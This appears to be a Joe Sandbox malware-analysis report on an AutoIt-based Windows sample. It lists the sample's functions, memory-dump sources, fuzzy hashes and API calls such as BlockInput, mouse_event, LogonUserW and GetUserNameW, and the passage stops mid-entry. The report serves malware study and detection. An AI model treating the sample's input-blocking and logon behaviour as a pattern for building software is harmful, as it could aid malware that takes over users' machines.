                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                              • Instruction ID: 65987276f42022e0a750be6b3a5490b3a71675218fe40503b27c9ce94a88d9d9
                              • Opcode Fuzzy Hash: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                              • Instruction Fuzzy Hash: 8D320321E6DF024DE7239674D832335A259EFB73D4F15D737E81AB5DA6EB2884839100
                              Function 008B267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                              • Instruction ID: ddc30f19c8aee4f91f0484c61645ba571ed60dc6cf1a6b31c22af6b96fe4dcc9
                              • Opcode Fuzzy Hash: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                              • Instruction Fuzzy Hash: BAB1EF20E3AF514DD32396398831336BA5CAFBB2D5F51D71BFC2674E62EB2189839141
                              Function 008E8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                              Download Yara Rule
                              APIs
                              • __time64.LIBCMT ref: 008E8B25
                                • Part of subcall function 008A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008E91F8,00000000,?,?,?,?,008E93A9,00000000,?), ref: 008A5443
                                • Part of subcall function 008A543A: __aulldiv.LIBCMT ref: 008A5463
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Time$FileSystem__aulldiv__time64
                              • String ID:
                              • API String ID: 2893107130-0
                              • Opcode ID: cd14655df31497f32a579f48a564704ad1e63a0bac76da6276a9dbf2ed838870
                              • Instruction ID: 208fc7cad908d448cc8ece66c0e46d7de1d0b5fc40cb080be009d51134e080d3
                              • Opcode Fuzzy Hash: cd14655df31497f32a579f48a564704ad1e63a0bac76da6276a9dbf2ed838870
                              • Instruction Fuzzy Hash: A221EB72539510CFC729CF25D441A52F3E1EBA5321B288E6CD0E9CF1D0CA74B945DB54
                              Function 008F41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • BlockInput.USER32(00000001), ref: 008F4218
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BlockInput
                              • String ID:
                              • API String ID: 3456056419-0
                              • Opcode ID: c69cf5fd57a01f1a7427b38165f4a953e37f0926a0a7f702bd72038517aad0c1
                              • Instruction ID: 848c49be8b5b061208c4d27530ff1574a74bfda4f49a54b6c27f9b9fd4ee3148
                              • Opcode Fuzzy Hash: c69cf5fd57a01f1a7427b38165f4a953e37f0926a0a7f702bd72038517aad0c1
                              • Instruction Fuzzy Hash: F8E01A312502189FC710AF69D844AAAB7E8FF94760F048026F94AC7752DA71A8408BA1
                              Function 008E4EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                              Download Yara Rule
                              APIs
                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008E4EEC
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: mouse_event
                              • String ID:
                              • API String ID: 2434400541-0
                              • Opcode ID: a2ad7da4c59335d2bead6ca05db0c17fa743749597c4a8a542d9c66ed87d937d
                              • Instruction ID: f875ca3de9013b8bc52489da072f306a1cb6411a347e677351af8000ac021b73
                              • Opcode Fuzzy Hash: a2ad7da4c59335d2bead6ca05db0c17fa743749597c4a8a542d9c66ed87d937d
                              • Instruction Fuzzy Hash: 3CD05E9816478B39EC684B279C5FF770208F3037A5FD0714AB10AC94C1D8D16C506031
                              Function 008D8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008D88D1), ref: 008D8CB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LogonUser
                              • String ID:
                              • API String ID: 1244722697-0
                              • Opcode ID: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                              • Instruction ID: 5d24131771877721f1f99df45e9c99aaab165559e3e4a7ba93d32db8b102197b
                              • Opcode Fuzzy Hash: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
                              • Instruction Fuzzy Hash: 70D05E3226450EAFEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D935AB60
                              Function 008C2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              • GetUserNameW.ADVAPI32(?,?), ref: 008C2242
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: a9e056546b4e260f10cf59328679d101abf3f915ee2851e984a95b6e4a3687b2
                              • Instruction ID: 99a9eaddc48583a74855bcbed1ac1434fd29dfbcf67e4b94dd27032207899883
                              • Opcode Fuzzy Hash: a9e056546b4e260f10cf59328679d101abf3f915ee2851e984a95b6e4a3687b2
                              • Instruction Fuzzy Hash: 30C04CF1C1410DDBDB15DB90DA98DEE77BCBB04314F104055A101F2101D7749B449E71
                              Function 008AA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008AA36A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                              • Instruction ID: 3839de2d887679ae65c6d4375d6ab527ffb68ddb97dc360c686ca4555ebd2467
                              • Opcode Fuzzy Hash: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                              • Instruction Fuzzy Hash: 09A0123001810CABCA001B41EC044447F9CD6002E07004020F40C40421873255105580
                              Function 00898A0E Relevance: .6, Instructions: 608COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2229784a5000e2636e412e9f023640a4eaf3810c221e5aee34ce0d72998ae40
                              • Instruction ID: 49436220916ba4a93e9735d98c5acfe112700b86a00de61bc27d97296e9f196d
                              • Opcode Fuzzy Hash: b2229784a5000e2636e412e9f023640a4eaf3810c221e5aee34ce0d72998ae40
                              • Instruction Fuzzy Hash: 6822147060561BCBDF28AB28C49467DB7A1FB03318F6C896BD842DB291DB34DD81DB61
                              Function 008A2405 Relevance: .3, Instructions: 345COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                              • Instruction ID: 2930c4a4e45338056cf2d74959c7bbe166d6d108fd167c5094990ccb8751adeb
                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                              • Instruction Fuzzy Hash: 31C172322051A309FF6D863D943413EBAE1BAA37B171A076DE4B3CB9D5EF20D564D620
                              Function 008A283A Relevance: .3, Instructions: 341COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction ID: dae6609a801792cf7797df7ade5582011e272c0182ec75830cc413020c350e1f
                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                              • Instruction Fuzzy Hash: 41C183322051A30AEF7D463D943413EBBE1ABA37B171A176DE4B2DB9D4EF20D5249620
                              Function 008A1BB8 Relevance: .3, Instructions: 323COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                              • Instruction ID: 9727c2afce1d6d529aee864f0d83bc5ee6bdf98cf9cf1598771c967f814fb71c
                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                              • Instruction Fuzzy Hash: ADC163362051A30DEF6D4639947813EBAE1FBA37B171A076DE4B2CB9D4EF20D524D610
                              Function 01103650 Relevance: .1, Instructions: 92COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                              • Instruction ID: b713fad75549fa1e8069edc61df6594151fa05d007bf17d7c2ae05d1b14e87bf
                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                              • Instruction Fuzzy Hash: 8741C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                              Function 01103540 Relevance: .0, Instructions: 35COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                              • Instruction ID: 6e6d3a947819157dec47a8b4de5df305d675393d2adc78a7aadc565ce36cdee1
                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                              • Instruction Fuzzy Hash: 4B01D278E10109EFCB49DF98C5809AEF7B5FB48310F208599D819A7341D731AE41DB80
                              Function 011034E0 Relevance: .0, Instructions: 35COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                              • Instruction ID: e1a5115747071acc29f358b139b8ac0ef536c9f6e20f07f63f09af1fc7ee5ffe
                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                              • Instruction Fuzzy Hash: A501DD78E10209EFCB49DF98C5809AEFBB5FB48310F208199E819A7341E771AE41DB80
                              Function 01101E70 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                              Function 008F7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                              Download Yara Rule
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 008F7B70
                              • DeleteObject.GDI32(00000000), ref: 008F7B82
                              • DestroyWindow.USER32 ref: 008F7B90
                              • GetDesktopWindow.USER32 ref: 008F7BAA
                              • GetWindowRect.USER32(00000000), ref: 008F7BB1
                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008F7CF2
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008F7D02
                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7D4A
                              • GetClientRect.USER32(00000000,?), ref: 008F7D56
                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 008F7D90
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DB2
                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DC5
                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DD0
                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DD9
                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DE8
                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DF1
                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7DF8
                              • GlobalFree.KERNEL32(00000000), ref: 008F7E03
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7E15
                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00912CAC,00000000), ref: 008F7E2B
                              • GlobalFree.KERNEL32(00000000), ref: 008F7E3B
                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 008F7E61
                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 008F7E80
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F7EA2
                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008F808F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                              • String ID: $AutoIt v3$DISPLAY$static
                              • API String ID: 2211948467-2373415609
                              • Opcode ID: 26d114f4a12055a0b56b79e2dca5a62fd377257e3591b35fc3e5e0efbf77fe12
                              • Instruction ID: 0a0935243023fb6958aa717b660afbff5988e9ac21aaf551d1bb48ee065e1cd0
                              • Opcode Fuzzy Hash: 26d114f4a12055a0b56b79e2dca5a62fd377257e3591b35fc3e5e0efbf77fe12
                              • Instruction Fuzzy Hash: 5B027C71914109EFDB14DF68CC99EAE7BB9FB49310F148168F915EB2A1CB70AD01DB60
                              Function 009037F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                              Download Yara Rule
                              APIs
                              • CharUpperBuffW.USER32(?,?,0090F910), ref: 009038AF
                              • IsWindowVisible.USER32(?), ref: 009038D3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharUpperVisibleWindow
                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                              • API String ID: 4105515805-45149045
                              • Opcode ID: 4812d920d4e9e4c52116684a148fb87140f61940626bf33e94e5de39dff78d51
                              • Instruction ID: 94e720b53f5320b69bc93fb839a2cba08ad8652b34f548e9a786a0cc9b2fad1d
                              • Opcode Fuzzy Hash: 4812d920d4e9e4c52116684a148fb87140f61940626bf33e94e5de39dff78d51
                              • Instruction Fuzzy Hash: 80D17C30204315DFCB24EF18C495A6A77A9FF95344F148959F8C69B7E2CB25EE0ACB42
                              Function 0090A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                              Download Yara Rule
                              APIs
                              • SetTextColor.GDI32(?,00000000), ref: 0090A89F
                              • GetSysColorBrush.USER32(0000000F), ref: 0090A8D0
                              • GetSysColor.USER32(0000000F), ref: 0090A8DC
                              • SetBkColor.GDI32(?,000000FF), ref: 0090A8F6
                              • SelectObject.GDI32(?,?), ref: 0090A905
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0090A930
                              • GetSysColor.USER32(00000010), ref: 0090A938
                              • CreateSolidBrush.GDI32(00000000), ref: 0090A93F
                              • FrameRect.USER32(?,?,00000000), ref: 0090A94E
                              • DeleteObject.GDI32(00000000), ref: 0090A955
                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0090A9A0
                              • FillRect.USER32(?,?,?), ref: 0090A9D2
                              • GetWindowLongW.USER32(?,000000F0), ref: 0090A9FD
                                • Part of subcall function 0090AB60: GetSysColor.USER32(00000012), ref: 0090AB99
                                • Part of subcall function 0090AB60: SetTextColor.GDI32(?,?), ref: 0090AB9D
                                • Part of subcall function 0090AB60: GetSysColorBrush.USER32(0000000F), ref: 0090ABB3
                                • Part of subcall function 0090AB60: GetSysColor.USER32(0000000F), ref: 0090ABBE
                                • Part of subcall function 0090AB60: GetSysColor.USER32(00000011), ref: 0090ABDB
                                • Part of subcall function 0090AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090ABE9
                                • Part of subcall function 0090AB60: SelectObject.GDI32(?,00000000), ref: 0090ABFA
                                • Part of subcall function 0090AB60: SetBkColor.GDI32(?,00000000), ref: 0090AC03
                                • Part of subcall function 0090AB60: SelectObject.GDI32(?,?), ref: 0090AC10
                                • Part of subcall function 0090AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0090AC2F
                                • Part of subcall function 0090AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090AC46
                                • Part of subcall function 0090AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0090AC5B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
